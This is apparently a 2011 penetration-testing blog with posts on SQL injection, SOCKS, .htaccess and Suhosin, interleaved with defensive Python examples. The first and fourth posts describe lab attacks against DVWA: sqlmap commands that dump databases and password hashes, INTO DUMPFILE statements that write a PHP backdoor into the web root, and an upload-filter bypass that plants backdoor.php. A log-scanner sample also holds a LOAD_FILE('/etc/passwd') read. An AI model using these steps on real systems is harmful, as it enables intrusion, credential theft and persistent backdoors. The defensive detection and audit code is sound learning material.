Sunday, July 24, 2011

SQL DUMPFILE

Vulnerable web page: http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=%27&Submit=Submit#
and I tried typing this into sqlmap:
root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.102/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie='PHPSESSID=ahh7j1bsrtrs5qtjn8tgpcp4g2; security=low' --dbs

then I get:
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL >= 5.0.0
[11:55:00] [INFO] fetching database names
available databases [14]:
[*] abal2
[*] auracms
[*] auracms1
[*] cdcol
[*] dvwa
[*] information_schema
[*] joomla
[*] joomla1
[*] mysql
[*] phpmyadmin
[*] test
[*] upload
[*] wordpress
[*] wordpress2

after typing:

root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie="PHPSESSID=lp7qif2ecvd2lod7rp3unddfs1; security=low" --password

and then I get:

web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5
[11:56:26] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:56:29] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[11:56:29] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL


Now I have 2 users: the first is pma and the second is root, both with no password.


After getting the MySQL user and password, I logged into SQL through the URL:
192.168.56.102/phpmyadmin
Then I created a database named bd
and I created the table for the upload.

Second, I created the table for the form.
After creating the database and the tables, the results can be seen like this:
Then I inserted the SQL like this:
To dump the files, type:
1. select * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak;
2. select * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file;

That finishes uploading the backdoor.
192.168.56.102/kotak.html

But there is a script error.
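Whether the two INTO DUMPFILE statements above succeed depends on a few MySQL conditions worth knowing: the database account needs the global FILE privilege (the XAMPP root account with an empty password has every privilege), the secure_file_priv setting must permit the target directory, the operating-system user that mysqld runs as must be able to write into the web root, and INTO DUMPFILE writes exactly one row with no delimiters, so it fails with "Result consisted of more than one row" when the source table holds more than one. From the defender's side the same statements are easy to spot in the MySQL general query log. The Python below is an added example, not code from the original post: it parses constructed general_log lines in the classic MySQL 5.x layout and flags file writes that land under a web root, as well as LOAD_FILE() reads. The XAMPP web root is the one used in the post; the other directories and the sample log lines are assumptions constructed for the example.

```python
"""Flag file-system access through MySQL in general query log lines.

Added example, not from the original post. Assumes the classic MySQL 5.x
general_log layout: "<yymmdd> <hh:mm:ss>\t<thread id> <command>\t<argument>",
with continuation lines that omit the timestamp. Sample lines are constructed.
"""
import posixpath
import re
from dataclasses import dataclass

# Directories the web server serves from. A write here can become a webshell.
# The XAMPP path is the one used in the post; the others are assumptions.
WEB_ROOTS = ("/opt/lampp/htdocs", "/var/www", "/srv/http")

LOG_LINE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+(\w+)\t?(.*)$")
FILE_WRITE = re.compile(r"\bINTO\s+(DUMPFILE|OUTFILE)\s+'([^']*)'", re.IGNORECASE)
FILE_READ = re.compile(r"\bLOAD_FILE\s*\(", re.IGNORECASE)

# Constructed sample: one session reading mysql.user, one dropping files into the web root.
SAMPLE_LOG = """\
110724 11:55:00\t   12 Connect\troot@localhost on dvwa
\t\t   12 Query\tSELECT user, password FROM mysql.user
110724 11:58:10\t   13 Connect\troot@localhost on bd
\t\t   13 Query\tselect * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak
\t\t   13 Query\tselect * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file
\t\t   13 Query\tSELECT id, name INTO OUTFILE '/tmp/report.csv' FROM kotak
\t\t   14 Query\tSELECT LOAD_FILE('/etc/passwd')
\t\t   14 Quit\t
"""


@dataclass
class Finding:
    thread_id: int
    kind: str          # "dumpfile", "outfile" or "load_file"
    path: str          # target of the write; "" for LOAD_FILE
    in_web_root: bool  # True when the write lands under WEB_ROOTS
    query: str


def under_web_root(path: str) -> bool:
    """Normalise '..' segments before comparing, so /tmp/../opt/lampp/htdocs/x is caught."""
    clean = posixpath.normpath(path)
    return any(clean == root or clean.startswith(root + "/") for root in WEB_ROOTS)


def scan_general_log(lines):
    """Return a Finding for every Query line that writes or reads a server-side file."""
    findings = []
    for raw in lines:
        m = LOG_LINE.match(raw.rstrip("\n"))
        if not m or m.group(2) != "Query":
            continue
        thread_id, query = int(m.group(1)), m.group(3)
        w = FILE_WRITE.search(query)
        if w:
            path = w.group(2)
            findings.append(Finding(thread_id, w.group(1).lower(), path, under_web_root(path), query))
        elif FILE_READ.search(query):
            findings.append(Finding(thread_id, "load_file", "", False, query))
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG.splitlines()):
        flag = "WEBSHELL?" if f.in_web_root else ""
        print(f"thread {f.thread_id}: {f.kind:9s} {f.path or '-':40s} {flag}")
```

The general log has to be switched on for this to see anything (general_log=ON, or log=... on older 5.x servers), and it grows fast, so in practice the same patterns are more often applied to a proxy or audit-plugin feed; the matching logic is the same.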

-=CMIIW=-

Tuesday, July 19, 2011

the difference between SOCKS4 and SOCKS5

SOCKS is a standard protocol for relaying TCP connections through a proxy server. Two versions are in common use, SOCKS version 4 (SOCKS4) and SOCKS version 5 (SOCKS5). The main difference is that SOCKS5 adds authentication: the client and the proxy negotiate an authentication method (for example username/password as defined in RFC 1929) before any CONNECT request is accepted, whereas SOCKS4 only carries an unverified user ID string. SOCKS5 also adds UDP relaying, IPv6 addresses, and the option of sending a domain name so that the proxy performs the DNS lookup.

SOCKS5 is compatible with most TCP applications. It also gives a basic chokepoint for access control: the proxy can decide per authenticated user which destinations are allowed, and because connections leave with the proxy's address, internal client addresses are hidden in much the same way as with network address translation (NAT). Note that SOCKS5 itself encrypts nothing; the username/password method sends the credentials in cleartext, so the hop to the proxy should be protected by other means, such as an SSH or VPN tunnel.
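The handshakes themselves make the difference clearer than a description. The Python below is an added example, not code from the original post: it builds the client messages of a SOCKS4 CONNECT and of a SOCKS5 session (method negotiation, RFC 1929 username/password, CONNECT), and pairs them with a minimal in-memory stand-in for the proxy side that refuses CONNECT until the client has authenticated. The user table, addresses and port numbers are made up for the example.

```python
"""SOCKS4 vs SOCKS5 on the wire: where authentication does, and does not, happen.

Added example, not code from the original post. Layouts follow the SOCKS4
protocol document, RFC 1928 (SOCKS5) and RFC 1929 (username/password). The
proxy side is an in-memory stand-in with a made-up user table, not a real server.
"""
from __future__ import annotations

import hmac
import ipaddress
import struct

SOCKS4_CONNECT = 0x01
SOCKS4_GRANTED, SOCKS4_REJECTED = 0x5A, 0x5B
NO_AUTH, USERPASS, NO_ACCEPTABLE = 0x00, 0x02, 0xFF  # SOCKS5 method codes
REP_SUCCESS, REP_NOT_ALLOWED = 0x00, 0x02           # SOCKS5 reply codes


def socks4_connect(ip: str, port: int, userid: str = "") -> bytes:
    """VN=4 | CD=1 | DSTPORT | DSTIP | USERID NUL.
    USERID is just a label: no password, no challenge. The proxy can at most
    ask the client's identd whether that user owns the connection."""
    header = struct.pack("!BBH4s", 4, SOCKS4_CONNECT, port, ipaddress.IPv4Address(ip).packed)
    return header + userid.encode("ascii") + b"\x00"


def socks5_greeting(methods: tuple[int, ...]) -> bytes:
    """VER=5 | NMETHODS | METHODS: the client offers the auth methods it supports."""
    return bytes([5, len(methods), *methods])


def socks5_userpass(username: str, password: str) -> bytes:
    """RFC 1929: VER=1 | ULEN | UNAME | PLEN | PASSWD. Both fields travel in cleartext."""
    u, p = username.encode(), password.encode()
    return bytes([1, len(u)]) + u + bytes([len(p)]) + p


def socks5_connect(host: str, port: int) -> bytes:
    """VER=5 | CMD=1 | RSV=0 | ATYP | DST.ADDR | DST.PORT.
    Unlike SOCKS4, the target may be a domain name (ATYP 3, resolved by the
    proxy) or an IPv6 address (ATYP 4)."""
    try:
        addr = ipaddress.ip_address(host)
        dst = bytes([1 if addr.version == 4 else 4]) + addr.packed
    except ValueError:
        name = host.encode("idna")
        dst = bytes([3, len(name)]) + name
    return bytes([5, 1, 0]) + dst + struct.pack("!H", port)


class Socks5ProxyStub:
    """Proxy-side state machine: enough to show that CONNECT is gated by auth."""

    def __init__(self, users: dict[str, str]):
        self.users = users          # made-up user table for the example
        self.authenticated = False

    def on_greeting(self, msg: bytes) -> bytes:
        methods = msg[2:2 + msg[1]]
        if msg[0] != 5 or USERPASS not in methods:
            # A proxy that requires auth never falls back to NO_AUTH; the client must close.
            return bytes([5, NO_ACCEPTABLE])
        return bytes([5, USERPASS])

    def on_userpass(self, msg: bytes) -> bytes:
        ulen = msg[1]
        user = msg[2:2 + ulen].decode()
        plen = msg[2 + ulen]
        supplied = msg[3 + ulen:3 + ulen + plen]
        expected = self.users.get(user, "").encode()
        self.authenticated = bool(expected) and hmac.compare_digest(expected, supplied)
        return bytes([1, 0x00 if self.authenticated else 0x01])  # STATUS 0 = success

    def on_connect(self, msg: bytes) -> bytes:
        """VER | REP | RSV | ATYP | BND.ADDR | BND.PORT."""
        if not self.authenticated or msg[:3] != bytes([5, 1, 0]):
            return bytes([5, REP_NOT_ALLOWED, 0, 1]) + b"\x00" * 6
        bound = ipaddress.IPv4Address("192.0.2.10").packed  # made-up egress address
        return bytes([5, REP_SUCCESS, 0, 1]) + bound + struct.pack("!H", 40000)


if __name__ == "__main__":
    proxy = Socks5ProxyStub({"bob": "s3cret"})
    for label, data in (
        ("SOCKS4 CONNECT  ->", socks4_connect("10.0.0.5", 80, "bob")),
        ("SOCKS5 greeting ->", socks5_greeting((NO_AUTH, USERPASS))),
        ("       method   <-", proxy.on_greeting(socks5_greeting((NO_AUTH, USERPASS)))),
        ("       userpass ->", socks5_userpass("bob", "s3cret")),
        ("       status   <-", proxy.on_userpass(socks5_userpass("bob", "s3cret"))),
        ("       CONNECT  ->", socks5_connect("example.com", 443)),
        ("       reply    <-", proxy.on_connect(socks5_connect("example.com", 443))),
    ):
        print(label, data.hex(" "))
```

Look at what the SOCKS4 request carries: a USERID string with nothing to back it, which is why SOCKS4 "authentication" amounts to identd at best. In SOCKS5 the proxy chooses from the methods the client offers; a proxy that requires credentials answers 0xFF to a client that only offers no-auth, and the client has to close the connection.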

CMIIW

Wednesday, July 13, 2011

what is htaccess

Everyone has opened a web page and been met with a "404 Error" or "page not found". On the Apache web server, what is shown in that situation, and much else about how a directory is served, can be controlled with a .htaccess file: a plain-text configuration file placed in a directory, which Apache reads (where AllowOverride permits it) and applies to that directory and everything below it.

Here are some of the functions of .htaccess:
- Protect folders with a password
- Redirect visitors to another page or site automatically
- Display your own error pages
- Deny visitors from certain IP addresses
- Change how file extensions are handled
- Only allow visitors from certain IP addresses
- Allow or deny directory listing
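To make the list concrete, here is a Python example that is added here and is not from the original post: it parses a constructed .htaccess file that exercises each of the functions above, reports which ones are in use, and flags the settings a reviewer would question. Two caveats belong next to the list: a .htaccess file only takes effect where the server's AllowOverride allows it, so directories that accept uploads should be served with AllowOverride None (otherwise an uploaded .htaccess can, for example, make .jpg files execute as PHP); and Basic authentication sends the password essentially in cleartext, so "password protection" is only as strong as the TLS in front of it. The sample file, its paths and the extension list are assumptions made for the example.

```python
"""Read a .htaccess file, say what it does, and flag risky directives.

Added example, not from the original post. The sample file below is constructed
for this example; directive meanings follow the Apache httpd 2.x documentation.
"""
import shlex

# Constructed sample covering each function from the post, with three risky settings.
SAMPLE_HTACCESS = """\
# password-protect this folder
AuthType Basic
AuthName "Staff only"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
Satisfy Any

# send visitors to the new location automatically
Redirect 301 /old.html http://www.example.com/new.html

# our own error page
ErrorDocument 404 /errors/404.html

# only our LAN, except one host
Order Allow,Deny
Allow from 10.0.0.0/8
Deny from 10.0.0.99

# change which extensions run as PHP
AddType application/x-httpd-php .php .jpg

# directory listing
Options +Indexes
"""

# Map directives to the functions listed in the post.
FEATURES = {
    "authtype": "password protection", "authuserfile": "password protection",
    "require": "password protection",
    "redirect": "redirect", "redirectmatch": "redirect", "rewriterule": "redirect",
    "errordocument": "custom error page",
    "order": "IP allow/deny", "allow": "IP allow/deny", "deny": "IP allow/deny",
    "addtype": "extension mapping", "addhandler": "extension mapping",
    "sethandler": "extension mapping",
    "options": "directory listing",
}
# Extensions that are expected to execute server-side code (assumed list).
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phps", ".cgi", ".pl"}


def parse_htaccess(text):
    """Return (line_no, directive_lowercased, args) for each non-comment line."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)          # honours quoted arguments like AuthName "Staff only"
        out.append((n, parts[0].lower(), parts[1:]))
    return out


def audit_htaccess(text):
    """Return (set of features in use, list of (line_no, warning))."""
    directives = parse_htaccess(text)
    names = {d for _, d, _ in directives}
    features = {FEATURES[d] for d in names if d in FEATURES}
    findings = []
    for n, d, args in directives:
        lower = [a.lower() for a in args]
        if d == "options" and any(a in ("indexes", "+indexes") for a in lower):
            findings.append((n, "directory listing enabled; use Options -Indexes"))
        if d in ("addtype", "addhandler") and lower and "php" in lower[0]:
            odd = [e for e in lower[1:] if e not in SCRIPT_EXTS]
            if odd:
                findings.append((n, f"{' '.join(odd)} will run as PHP: an uploaded 'image' "
                                    f"with that extension becomes a webshell"))
        if d == "satisfy" and lower[:1] == ["any"] and "authtype" in names:
            findings.append((n, "Satisfy Any: clients allowed by IP skip the password entirely"))
        if d == "authtype" and "require" not in names:
            findings.append((n, "AuthType without Require: nobody is actually asked for a password"))
    return features, findings


if __name__ == "__main__":
    feats, warns = audit_htaccess(SAMPLE_HTACCESS)
    print("functions in use:", ", ".join(sorted(feats)))
    for n, msg in warns:
        print(f"line {n}: {msg}")
```

The checks are deliberately narrow: they look for the handful of combinations that turn a convenience file into an exposure (listing enabled, a non-script extension handed to the PHP handler, and Satisfy Any undoing a password requirement), rather than trying to validate Apache syntax.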

Monday, July 11, 2011

web and system

Now I am learning to get into a web application, plant a backdoor, and exploit the system.
There was a vulnerability in the web application's file upload. The upload feature was already filtered, so it could only upload JPEG files.
I used Burp Suite to intercept the request and replace the content, so that files other than JPEG could be uploaded.
I uploaded backdoor.php, so the web application now had my backdoor.
Then I went into the backdoor and tried to exploit the system.


I used a lot of references, such as the exploits on www.exploit-db.com, etc. I tried various exploits against the kernel, and it turned out that the kernel of the system was already patched, so the chance of a kernel exploit succeeding was very small.

My suggestion: when exploiting a system, it is not only the kernel that can be exploited; it can also be done from the application side, and through its developers.
  

Sunday, July 10, 2011

PHP SUHOSIN

Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and in the PHP core. Suhosin comes in two independent parts, a patch to the PHP core and a PHP extension, which can be used separately or combined.

The Suhosin patch and the Suhosin extension can be downloaded from http://www.hardened-php.net/suhosin/download.html


installation
Preparation
If you want to install PHP with the Suhosin patch you must first do some preparatory steps.


Step 1: install the Hardened-PHP Project signature key
First, grab a copy of http://www.hardened-php.net/hardened-php-signature-key.asc and import it into your GNU Privacy Guard keychain:
 


#> gpg --import < hardened-php-signature-key.asc
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 0A864AA1: public key "Hardened-PHP Signature Key" imported
gpg: Total number processed: 1
gpg:               imported: 1
 
Step 2: download and check the necessary files

Now it is time to grab a copy of the newest PHP tarball and the latest version of the Suhosin patch. In addition, you must obtain the digital signature (*.sig) files for both. You can get all of these from http://www.hardened-php.net/suhosin/download.html

As a first precaution you can compare the MD5 hash of each downloaded file with the one listed on the download page. This only catches a corrupted download: MD5 is not collision resistant, and anyone able to replace the files on the site could just as easily replace the published hashes. The .sig files are what establish authenticity, so verify each detached signature with GnuPG against the key imported in step 1 before you unpack or patch anything.

#> md5sum php-5.1.4.tar.bz2
66a806161d4a2d3b5153ebe4cd0f2e1c php-5.1.4.tar.bz2
#> md5sum suhosin-patch-5.1.4-0.9.0.patch.gz
ea9026495c4ce34a329fd0a87474f1ba suhosin-patch-5.1.4-0.9.0.patch.gz

Step 3: unpacking and patching
You must now unpack the PHP tarball, gunzip the patch file and then apply the patch.

#> tar -xjf php-5.1.4.tar.bz2
#> gunzip suhosin-patch-5.1.4-0.9.0.patch.gz
#> cd php-5.1.4
#> patch -p1 -i ../suhosin-patch-5.1.4-0.9.0.patch